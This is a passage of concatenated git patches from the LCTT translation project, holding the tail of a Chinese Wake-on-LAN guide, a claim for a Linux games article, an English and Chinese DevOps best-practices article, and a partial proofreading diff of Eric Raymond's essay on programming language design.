- -``` -# ethtool eth0 | grep -i wake-on - Supports Wake-on: pumbg - Wake-on: g -``` -这条命令输出的 Supports Wake-on字段会告诉你你的网卡现在开启了哪些功能: -    -* d -- 禁用 - -* p -- 物理活动唤醒 - -* u -- 单播消息唤醒 - -* m -- 多播(组播)消息唤醒 - -* b -- 广播消息唤醒 - -* a -- ARP(Address Resolution Protocol) 唤醒 - -* g -- magic packet 唤醒 - -* s -- 设有密码的 magic packet 唤醒 - -man ethtool 命令并没说清楚 p 选项的作用;这表明任何信号都会导致唤醒。然而,在我的测试中它并没有这么做。想要实现远程唤醒主机,必须支持的功能是g -- magic packet 唤醒,而且显示这个功能已经在启用了。如果它没有被启用,你可以通过 ethtool 命令来启用它。 - -``` -# ethtool -s eth0 wol g -``` -这条命令可能会在重启后失效,所以为了确保万无一失,你可以创建个 root 用户的定时任务(cron)在每次重启的时候来执行这条命令。 -``` -@reboot /usr/bin/ethtool -s eth0 wol g -``` - -### [fig-2.png][3] - -![wakeonlan](https://www.linux.com/sites/lcom/files/styles/floated_images/public/fig-2_7.png?itok=XQAwmHoQ) - -Figure 2: Enable Wake on LAN. - -[Used with permission][9] - -另一个选择是最近的网络管理器版本有一个很好的小复选框来启用Wake-On-LAN(图2)。 - -这里有一个可以用于设置密码的地方,但是如果你的网络接口不支持 Secure On password,它就不起作用。 - -现在你需要配置第二台计算机来发送唤醒信号。你并不需要 root 权限,所以你可以为你的用户创建 cron 任务。你需要用到的是想要唤醒的机器的网络接口和MAC地址信息。 - -``` -30 08 * * * /usr/bin/wakeonlan D0:50:99:82:E7:2B -``` -### RTC 唤醒(RTC Alarm Clock) - -通过使用实时闹钟来唤醒计算机是最不可靠的方法。对于这个方法,可以参看 [Wake Up Linux With an RTC Alarm Clock][4] ;对于现在的大多数发行版来说这种方法已经有点过时了。 - -下周继续了解更多关于使用RTC唤醒的方法。 - -通过 Linux 基金会和 edX 可以学习更多关于 Linux 的免费 [ Linux 入门][5]教程。 - --------------------------------------------------------------------------------- - -via:https://www.linux.com/learn/intro-to-linux/2017/11/wake-and-shut-down-linux-automatically - -作者:[Carla Schroder] -译者:[译者ID](https://github.com/HardworkFish) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[1]:https://www.linux.com/files/images/bannerjpg -[2]:https://www.linux.com/files/images/fig-1png-11 -[3]:https://www.linux.com/files/images/fig-2png-7 -[4]:https://www.linux.com/learn/wake-linux-rtc-alarm-clock -[5]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux -[6]:https://www.linux.com/licenses/category/creative-commons-attribution -[7]:http://www.columbia.edu/itc/mealac/pritchett/00routesdata/1700_1799/jaipur/delhijantarearly/delhijantarearly.html -[8]:https://www.linux.com/licenses/category/used-permission -[9]:https://www.linux.com/licenses/category/used-permission - From f01eac69d05de4a92aebdf0602feaa280338616a Mon Sep 17 00:00:00 2001 From: Yixun Xu Date: Tue, 5 Dec 2017 10:40:50 -0500 Subject: [PATCH 0326/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E8=AE=A4=E9=A2=86?= =?UTF-8?q?=2030=20Best=20Linux=20Games...?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...1204 30 Best Linux Games On Steam You Should Play in 2017.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md index 3248358b37..7a14f92847 100644 --- a/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md +++ b/sources/tech/20171204 30 Best Linux Games On Steam You Should Play in 2017.md @@ -1,3 +1,5 @@ +yixunx translating + 30 Best Linux Games On Steam You Should Play in 2017 ============================================================ From 7f54fbf12e9ce45dc7859ed0eb323fa79d3be37e Mon Sep 17 00:00:00 2001 From: aiwhj Date: Wed, 6 Dec 2017 01:40:45 +0800 Subject: [PATCH 0327/1627] translated --- ...actices for getting started with DevOps.md | 95 ------------------- ...actices for getting started with DevOps.md | 92 ++++++++++++++++++ 2 files changed, 92 insertions(+), 95 deletions(-) delete mode 100644 sources/tech/20171129 5 best practices for getting started with DevOps.md create mode 100644 translated/tech/20171129 5 best practices for getting started with DevOps.md diff --git a/sources/tech/20171129 5 best practices for getting started with DevOps.md b/sources/tech/20171129 5 best practices for getting started with DevOps.md deleted file mode 100644 index 7694180c14..0000000000 --- a/sources/tech/20171129 5 best practices for getting started with DevOps.md +++ /dev/null @@ -1,95 +0,0 @@ -translating---aiwhj -5 best practices for getting started with DevOps -============================================================ - -### Are you ready to implement DevOps, but don't know where to begin? Try these five best practices. - - -![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") -Image by :  - -[Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] - -DevOps often stymies early adopters with its ambiguity, not to mention its depth and breadth. By the time someone buys into the idea of DevOps, their first questions usually are: "How do I get started?" and "How do I measure success?" These five best practices are a great road map to starting your DevOps journey. - -### 1\. Measure all the things - -You don't know for sure that your efforts are even making things better unless you can quantify the outcomes. Are my features getting out to customers more rapidly? Are fewer defects escaping to them? Are we responding to and recovering more quickly from failure? - -Before you change anything, think about what kinds of outcomes you expect from your DevOps transformation. When you're further into your DevOps journey, you'll enjoy a rich array of near-real-time reports on everything about your service. But consider starting with these two metrics: - -* **Time to market** measures the end-to-end, often customer-facing, business experience. It usually begins when a feature is formally conceived and ends when the customer can consume the feature in production. Time to market is not mainly an engineering team metric; more importantly it shows your business' complete end-to-end efficiency in bringing valuable new features to market and isolates opportunities for system-wide improvement. - -* **Cycle time** measures the engineering team process. Once work on a new feature starts, when does it become available in production? This metric is very useful for understanding the efficiency of the engineering team and isolating opportunities for team-level improvement. - -### 2\. Get your process off the ground - -DevOps success requires an organization to put a regular (and hopefully effective) process in place and relentlessly improve upon it. It doesn't have to start out being effective, but it must be a regular process. Usually that it's some flavor of agile methodology like Scrum or Scrumban; sometimes it's a Lean derivative. Whichever way you go, pick a formal process, start using it, and get the basics right. - -Regular inspect-and-adapt behaviors are key to your DevOps success. Make good use of opportunities like the stakeholder demo, team retrospectives, and daily standups to find opportunities to improve your process. - -A lot of your DevOps success hinges on people working effectively together. People on a team need to work from a common process that they are empowered to improve upon. They also need regular opportunities to share what they are learning with other stakeholders, both upstream and downstream, in the process. - -Good process discipline will help your organization consume the other benefits of DevOps at the great speed that comes as your success builds. - -Although it's common for more development-oriented teams to successfully adopt processes like Scrum, operations-focused teams (or others that are more interrupt-driven) may opt for a process with a more near-term commitment horizon, such as Kanban. - -### 3\. Visualize your end-to-end workflow - -There is tremendous power in being able to see who's working on what part of your service at any given time. Visualizing your workflow will help people know what they need to work on next, how much work is in progress, and where the bottlenecks are in the process. - -You can't effectively limit work in process until you can see it and quantify it. Likewise, you can't effectively eliminate bottlenecks until you can clearly see them. - -Visualizing the entire workflow will help people in all parts of the organization understand how their work contributes to the success of the whole. It can catalyze relationship-building across organizational boundaries to help your teams collaborate more effectively towards a shared sense of success. - -### 4\. Continuous all the things - -DevOps promises a dizzying array of compelling automation. But Rome wasn't built in a day. One of the first areas you can focus your efforts on is [continuous integration][10] (CI). But don't stop there; you'll want to follow quickly with [continuous delivery][11] (CD) and eventually continuous deployment. - -Your CD pipeline is your opportunity to inject all manner of automated quality testing into your process. The moment new code is committed, your CD pipeline should run a battery of tests against the code and the successfully built artifact. The artifact that comes out at the end of this gauntlet is what progresses along your process until eventually it's seen by customers in production. - -Another "continuous" that doesn't get enough attention is continuous improvement. That's as simple as setting some time aside each day to ask your colleagues: "What small thing can we do today to get better at how we do our work?" These small, daily changes compound over time into more profound results. You'll be pleasantly surprised! But it also gets people thinking all the time about how to improve things. - -### 5\. Gherkinize - -Fostering more effective communication across your organization is crucial to fostering the sort of systems thinking prevalent in successful DevOps journeys. One way to help that along is to use a shared language between the business and the engineers to express the desired acceptance criteria for new features. A good product manager can learn [Gherkin][12] in a day and begin using it to express acceptance criteria in an unambiguous, structured form of plain English. Engineers can use this Gherkinized acceptance criteria to write acceptance tests against the criteria, and then develop their feature code until the tests pass. This is a simplification of [acceptance test-driven development][13](ATDD) that can also help kick start your DevOps culture and engineering practice. - -### Start on your journey - -Don't be discouraged by getting started with your DevOps practice. It's a journey. And hopefully these five ideas give you solid ways to get started. - - -### About the author - - [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] - - Magnus Hedemark - Magnus has been in the IT industry for over 20 years, and a technology enthusiast for most of his life. He's presently Manager of DevOps Engineering at UnitedHealth Group. In his spare time, Magnus enjoys photography and paddling canoes. - --------------------------------------------------------------------------------- - -via: https://opensource.com/article/17/11/5-keys-get-started-devops - -作者:[Magnus Hedemark ][a] -译者:[译者ID](https://github.com/译者ID) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://opensource.com/users/magnus919 -[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 -[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 -[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 -[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 -[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 -[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI -[7]:https://opensource.com/user/25739/feed -[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== -[9]:https://creativecommons.org/licenses/by-sa/4.0/ -[10]:https://martinfowler.com/articles/continuousIntegration.html -[11]:https://martinfowler.com/bliki/ContinuousDelivery.html -[12]:https://cucumber.io/docs/reference -[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development -[14]:https://opensource.com/users/magnus919 -[15]:https://opensource.com/users/magnus919 -[16]:https://opensource.com/users/magnus919 -[17]:https://opensource.com/tags/devops diff --git a/translated/tech/20171129 5 best practices for getting started with DevOps.md b/translated/tech/20171129 5 best practices for getting started with DevOps.md new file mode 100644 index 0000000000..3fa96176d5 --- /dev/null +++ b/translated/tech/20171129 5 best practices for getting started with DevOps.md @@ -0,0 +1,92 @@ +5 个最佳实践开始你的 DevOps 之旅 +============================================================ + +### 想要实现 DevOps 但是不知道如何开始吗?试试这 5 个最佳实践吧。 + + +![5 best practices for getting started with DevOps](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/devops-gears.png?itok=rUejbLQX "5 best practices for getting started with DevOps") + +Image by : [Andrew Magill][8]. Modified by Opensource.com. [CC BY 4.0][9] + +想要采用 DevOps 的人通常会过早的被它的歧义性给吓跑,更不要说更加深入的使用了。当一些人开始使用 DevOps 的时候都会问:“如何开始使用呢?”,”怎么才算使用了呢?“。这 5 个最佳实践是很好的路线图来指导你的 DevOps 之旅。 + +### 1\. 衡量所有的事情 + +除非你能量化输出结果,否则你并不能确认你的努力能否使事情变得更好。新功能能否快速的输出给客户?有更少的漏洞泄漏给他们吗?出错了能快速应对和恢复吗? + +在你开始做任何修改之前,思考一下你切换到 DevOps 之后想要一些什么样的输出。随着你的 DevOps 之旅,将享受到服务的所有内容的丰富的实时报告,从这两个指标考虑一下: + +* **上架时间** 衡量端到端,通常是面向客户的业务经验。这通常从一个功能被正式提出而开始,客户在产品中开始使用这个功能而结束。上架时间不是团队的主要指标;更加重要的是,当开发出一个有价值的新功能时,它表明了你完成业务的效率,为系统改进提供了一个机会。 + +* **时间周期** 衡量工程团队的进度。从开始开发一个新功能开始,到在产品中运行需要多久?这个指标对于你理解团队的效率是非常有用的,为团队等级的提升提供了一个机会。 + +### 2\. 放飞你的流程 + +DevOps 的成功需要团队布置一个定期流程并且持续提升它。这不总是有效的,但是必须是一个定期(希望有效)的流程。通常它有一些敏捷开发的味道,就像 Scrum 或者 Scrumban 一样;一些时候它也像精益开发。不论你用的什么方法,挑选一个正式的流程,开始使用它,并且做好这些基础。 + +定期检查和调整流程是 DevOps 成功的关键,抓住相关演示,团队回顾,每日会议的机会来提升你的流程。 + +DevOps 的成功取决于大家一起有效的工作。团队的成员需要在一个有权改进的公共流程中工作。他们也需要定期找机会分享从这个流程中上游或下游的其他人那里学到的东西。 + +随着你构建成功。好的流程规范能帮助你的团队以很快的速度体会到 DevOps 其他的好处 + +尽管更多面向开发的团队采用 Scrum 是常见的,但是以运营为中心的团队(或者其他中断驱动的团队)可能选用一个更短期的流程,例如 Kanban。 + +### 3\. 可视化工作流程 +这是很强大的,能够看到哪个人在给定的时间做哪一部分工作,可视化你的工作流程能帮助大家知道接下来应该做什么,流程中有多少工作以及流程中的瓶颈在哪里。 + +在你看到和衡量之前你并不能有效的限制流程中的工作。同样的,你也不能有效的排除瓶颈直到你清楚的看到它。 + +全部工作可视化能帮助团队中的成员了解他们在整个工作中的贡献。这样可以促进跨组织边界的关系建设,帮助您的团队更有效地协作,实现共同的成就感。 + +### 4\. 持续化所有的事情 + +DevOps 应该是强制自动化的。然而罗马不是一日建成的。你应该注意的第一个事情应该是努力的持续集成(CI),但是不要停留到这里;紧接着的是持续交付(CD)以及最终的持续部署。 + +持续部署的过程中是个注入自动测试的好时机。这个时候新代码刚被提交,你的持续部署应该运行测试代码来测试你的代码和构建成功的加工品。这个加工品经受流程的考验被产出直到最终被客户看到。 + +另一个“持续”是不太引人注意的持续改进。一个简单的场景是每天询问你旁边的同事:“今天做些什么能使工作变得更好?”,随着时间的推移,这些日常的小改进融合到一起会引起很大的结果,你将很惊喜!但是这也会让人一直思考着如何改进。 + +### 5\. Gherkinize + +促进组织间更有效的沟通对于成功的 DevOps 的系统思想至关重要。在程序员和业务员之间直接使用共享语言来描述新功能的需求文档对于沟通是个好办法。一个好的产品经理能在一天内学会 [Gherkin][12] 然后使用它构造出明确的英语来描述需求文档,工程师会使用 Gherkin 描述的需求文档来写功能测试,之后开发功能代码直到代码通过测试。这是一个简化的 [验收测试驱动开发][13](ATDD),这样就开始了你的 DevOps 文化和开发实践。 + +### 开始你旅程 + +不要自馁哦。希望这五个想法给你坚实的入门方法。 + + +### 关于作者 + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/pictures/headshot_4.jpg?itok=jntfDCfX)][14] + + Magnus Hedemark - Magnus 在IT行业已有20多年,并且一直热衷于技术。他目前是 nitedHealth Group 的 DevOps 工程师。在业余时间,Magnus 喜欢摄影和划独木舟。 + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/5-keys-get-started-devops + +作者:[Magnus Hedemark ][a] +译者:[aiwhj](https://github.com/aiwhj) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/magnus919 +[1]:https://opensource.com/tags/devops?src=devops_resource_menu1 +[2]:https://opensource.com/resources/devops?src=devops_resource_menu2 +[3]:https://www.openshift.com/promotions/devops-with-openshift.html?intcmp=7016000000127cYAAQ&src=devops_resource_menu3 +[4]:https://enterprisersproject.com/article/2017/5/9-key-phrases-devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu4 +[5]:https://www.redhat.com/en/insights/devops?intcmp=7016000000127cYAAQ&src=devops_resource_menu5 +[6]:https://opensource.com/article/17/11/5-keys-get-started-devops?rate=oEOzMXx1ghbkfl2a5ae6AnvO88iZ3wzkk53K2CzbDWI +[7]:https://opensource.com/user/25739/feed +[8]:https://ccsearch.creativecommons.org/image/detail/7qRx_yrcN5isTMS0u9iKMA== +[9]:https://creativecommons.org/licenses/by-sa/4.0/ +[10]:https://martinfowler.com/articles/continuousIntegration.html +[11]:https://martinfowler.com/bliki/ContinuousDelivery.html +[12]:https://cucumber.io/docs/reference +[13]:https://en.wikipedia.org/wiki/Acceptance_test%E2%80%93driven_development +[14]:https://opensource.com/users/magnus919 +[15]:https://opensource.com/users/magnus919 +[16]:https://opensource.com/users/magnus919 +[17]:https://opensource.com/tags/devops From 9c85d472b21dbf1d0e3218b148826bff21d867d4 Mon Sep 17 00:00:00 2001 From: wxy Date: Wed, 6 Dec 2017 09:11:52 +0800 Subject: [PATCH 0328/1627] PRF:20171118 Language engineering for great justice.md MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit 初步校对,@Valoniakim @yunfengHe 再帮着过一遍~ --- ... Language engineering for great justice.md | 118 +++++++++--------- 1 file changed, 59 insertions(+), 59 deletions(-) diff --git a/translated/tech/20171118 Language engineering for great justice.md b/translated/tech/20171118 Language engineering for great justice.md index 301337b11c..fc116e2e18 100644 --- a/translated/tech/20171118 Language engineering for great justice.md +++ b/translated/tech/20171118 Language engineering for great justice.md @@ -1,59 +1,59 @@ - -最合理的语言工程模式 - -============================================================ - - - -当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义,社会学意义,达到了奥地利经济学家所称的“人类行为学”,这是目的明确的人类行为所能达到的最大范围。 - - - -对我来说这并不只是抽象理论。当我在开源发展项目中编写时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 - - - -在这个背景下,我在第三篇额外的文章中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的,更实用的点子,它们主要是关于计算机语言设计的分析,例如为什么他们会成功,或为什么他们会失败。 - - - -在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 - - - -现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言,函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? - - - -所谓的“远”“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 - - - -在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题。汇编语言是短期解决方案,图解说明非通用语言的分类应用,还有关门电阻不断上涨的成本。随着计算机技术的发展,PHP 和 Javascript逐渐应用于游戏中。至于长期的解决方案? Oberon , Ocaml , ML , XML-Docbook 都可以。 他们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能没能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 - - - -如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 - - - -这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: ①以远近为轴,在自身和预计的未来之间选取一个最适点,然后 ②降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 - - - -在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 - - - -当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! - - - -相反的, C 语言低廉的内部转化费用未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN , Pascal , 汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 - - - -C++ 语言同样胜在它低廉的转化费用。很快,大部分新兴的语言为了降低自身转化费用,纷纷参考 C 语言语法。请注意这给未来的语言设计环境带来了什么影响:它尽可能地提高了 C-like 语言的价值,以此来降低其他语言转化为 C 语言的转化成本。 - - - -另一种降低转入成本的方法十分简单,即使没接触过编程的人都能学会,但这种方法很难完成。我认为唯一使用了这种方法的 Python就是靠这种方法进入了职业比赛。对这个方法我一带而过,是因为它并不是我希望看到的,顺利执行的系统语言战略,虽然我很希望它不是那样的。 - - - -今天我们在2017年年底聚集在这里,下一项我们应该为某些暴躁的团体发声,如 Go 团队,但事实并非如此。 Go 这个项目漏洞百出,我甚至可以想象出它失败的各种可能,Go 团队太过固执独断,即使几乎整个用户群体都认为 Go 需要做出改变了,Go 团队也无动于衷,这是个大问题。 一旦发生故障, GC 发生延迟或者用牺牲生产量来弥补延迟,但无论如何,它都会严重影响到这种语言的应用,大幅缩小这种语言的适用范围。 - - - -即便如此,在 Go 的设计中,还是有一个我颇为认同的远大战略目标,想要理解这个目标,我们需要回想一下如果想要取代 C 语言,要面临的短期问题是什么。同我之前提到的,随着项目计划的不断扩张,故障率也在持续上升,这其中内存管理方面的故障尤其多,而内存管理一直是崩溃漏洞和安全漏洞的高发领域。 - - - -我们现在已经知道了两件十分中重要的紧急任务,要想取代 C 语言,首先要先做到这两点:(1)解决内存管理问题;(2)降低由 C 语言向本语言转化时所需的转入成本。纵观编程语言的历史——从人类行为学的角度来看,作为 C 语言的准替代者,如果不能有效解决转入成本过高这个问题,那他们所做的其他部分做得再好都不算数。相反的,如果他们把转入成本过高这个问题解决地很好,即使他们其他部分做的不是最好的,人们也不会对他们吹毛求疵。 - - - -这正是 Go 的做法,但这个理论并不是完美无瑕的,它也有局限性。目前 GC 延迟限制了它的发展,但 Go 现在选择照搬 Unix 下 C 语言的传染战略,让自身语言变成易于转入,便于传播的语言,其繁殖速度甚至快于替代品。但从长远角度看,这并不是个好办法。 - - - -当然, Rust 语言的不足是个十分明显的问题,我们不应当回避它。而它,正将自己定位为适用于长远计划的选择。在之前的部分中我已经谈到了为什么我觉得它还不完美,Rust 语言在 TIBOE 和PYPL 指数上的成就也证明了我的说法,在 TIBOE 上 Rust 从来没有进过前20名,在 PYPL 指数上它的成就也比 Go 差很多。 - - - -五年后 Rust 能发展的怎样还是个问题,如果他们愿意改变,我建议他们重视转入成本问题。以我个人经历来说,由 C 语言转入 Rust 语言的能量壁垒使人望而却步。如果编码提升工具比如 Corrode 只能把 C 语言映射为不稳定的 Rust 语言,但不能解决能量壁垒的问题;或者如果有更简单的方法能够自动注释所有权或试用期,人们也不再需要它们了——这些问题编译器就能够解决。目前我不知道怎样解决这个问题,但我觉得他们最好找出解决方案。 - - - -在最后我想强调一下,虽然在 Ken Thompson 的设计经历中,他看起来很少解决短期问题,但他对未来有着极大的包容性,并且这种包容性还在不断提升。当然 Unix 也是这样的, 它让我不禁暗自揣测,让我认为 Go 语言中令人不快的地方都其实是他们未来事业的基石(例如缺乏泛型)。如果要确认这件事是真假,我需要比 Ken 还要聪明,但这并不是一件容易让人相信的事情。 - - - --------------------------------------------------------------------------------- - - - -via: http://esr.ibiblio.org/?p=7745 - - - -作者:[Eric Raymond ][a] - -译者:[Valoniakim](https://github.com/Valoniakim) - -校对:[校对者ID](https://github.com/校对者ID) - - - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 - - - -[a]:http://esr.ibiblio.org/?author=2 - -[1]:http://esr.ibiblio.org/?author=2 - -[2]:http://esr.ibiblio.org/?p=7711&cpage=1#comment-1913931 - -[3]:http://esr.ibiblio.org/?p=7745 +ESR:最合理的语言工程模式 +============================================================ + +当你熟练掌握一体化工程技术时,你就会发现它逐渐超过了技术优化的层面。我们制作的每件手工艺品都在一个大环境背景下,在这个环境中,人类的行为逐渐突破了经济意义、社会学意义,达到了奥地利经济学家所称的“人类行为学praxeology”,这是目的明确的人类行为所能达到的最大范围。 + +对我来说这并不只是抽象理论。当我在开源开发项目中编写论文时,我的行为就十分符合人类行为学的理论,这行为不是针对任何特定的软件技术或某个客观事物,它指的是在开发科技的过程中人类行为的背景环境。从人类行为学角度对科技进行的解读不断增加,大量的这种解读可以重塑科技框架,带来人类生产力和满足感的极大幅度增长,而这并不是由于我们换了工具,而是在于我们改变了掌握它们的方式。 + +在这个背景下,我的计划之外的文章系列的第三篇中谈到了 C 语言的衰退和正在到来的巨大改变,而我们也确实能够感受到系统编程的新时代的到来,在这个时刻,我决定把我之前有的大体的预感具象化为更加具体的、更实用的想法,它们主要是关于计算机语言设计的分析,例如为什么它们会成功,或为什么它们会失败。 + +在我最近的一篇文章中,我写道:所有计算机语言都是对机器资源的成本和程序员工作成本的相对权衡的结果,和对其相对价值的体现。这些都是在一个计算能力成本不断下降但程序员工作成本不减反增的背景下产生的。我还强调了转化成本在使原有交易主张适用于当下环境中的新增角色。在文中我将编程人员描述为一个寻找今后最适方案的探索者。 + +现在我要讲一讲最后一点。以现有水平为起点,一个语言工程师有极大可能通过多种方式推动语言设计的发展。通过什么系统呢? GC 还是人工分配?使用何种配置,命令式语言、函数程式语言或是面向对象语言?但是从人类行为学的角度来说,我认为它的形式会更简洁,也许只是选择解决长期问题还是短期问题? + +所谓的“远”、“近”之分,是指硬件成本的逐渐降低,软件复杂程度的上升和由现有语言向其他语言转化的成本的增加,根据它们的变化曲线所做出的判断。短期问题指编程人员眼下发现的问题,长期问题指可预见的一系列情况,但它们一段时间内不会到来。针对近期问题所做出的部署需要非常及时且有效,但随着情况的变化,短期解决方案有可能很快就不适用了。而长期的解决方案可能因其过于超前而夭折,或因其代价过高无法被接受。 + +在计算机刚刚面世的时候, FORTRAN 是近期亟待解决的问题, LISP 是远期问题,汇编语言是短期解决方案。说明这种分类适用于非通用语言,还有 roff 标记语言。随着计算机技术的发展,PHP 和 Javascript 逐渐参与到这场游戏中。至于长期的解决方案? Oberon、Ocaml、ML、XML-Docbook 都可以。 它们形成的激励机制带来了大量具有突破性和原创性的想法,事态蓬勃但未形成体系,那个时候距离专业语言的面世还很远,(值得注意的是这些想法的出现都是人类行为学中的因果,并非由于某种技术)。专业语言会失败,这是显而易见的,它的转入成本高昂,让大部分人望而却步,因此不能达到能够让主流群体接受的水平,被孤立,被搁置。这也是 LISP 不为人知的的过去,作为前 LISP 管理层人员,出于对它深深的爱,我为你们讲述了这段历史。 + +如果短期解决方案出现故障,它的后果更加惨不忍睹,最好的结果是期待一个相对体面的失败,好转换到另一个设计方案。(通常在转化成本较高时)如果他们执意继续,通常造成众多方案相互之间藕断丝连,形成一个不断扩张的复合体,一直维持到不能运转下去,变成一堆摇摇欲坠的杂物。是的,我说的就是 C++ 语言,还有 Java 描述语言,(唉)还有 Perl,虽然 Larry Wall 的好品味成功地让他维持了很多年,问题一直没有爆发,但在 Perl 6 发行时,他的好品味最终引爆了整个问题。 + +这种思考角度激励了编程人员向着两个不同的目的重新塑造语言设计: (1)以远近为轴,在自身和预计的未来之间选取一个最适点,然后(2)降低由一种或多种语言转化为自身语言的转入成本,这样你就可以吸纳他们的用户群。接下来我会讲讲 C 语言是怎样占领全世界的。 + +在整个计算机发展史中,没有谁能比 C 语言完美地把握最适点的选取了,我要做的只是证明这一点,作为一种实用的主流语言, C 语言有着更长的寿命,它目睹了无数个竞争者的兴衰,但它的地位仍旧不可取代。从淘汰它的第一个竞争者到现在已经过了 35 年,但看起来C语言的终结仍旧不会到来。 + +当然,如果你愿意的话,可以把 C 语言的持久存在归功于人类的文化惰性,但那是对“文化惰性”这个词的曲解, C 语言一直得以延续的真正原因是没有人提供足够的转化费用! + +相反的, C 语言低廉的内部转化成本未得到应有的重视,C 语言是如此的千变万化,从它漫长统治时期的初期开始,它就可以适用于多种语言如 FORTRAN、Pascal 、汇编语言和 LISP 的编程习惯。在二十世纪八十年代我就注意到,我可以根据编程人员的编码风格判断出他的母语是什么,这也从另一方面证明了C 语言的魅力能够吸引全世界的人使用它。 + +C++ 语言同样胜在它低廉的转化成本。很快,大部分新兴的语言为了降低自身转化成本,纷纷参考 C 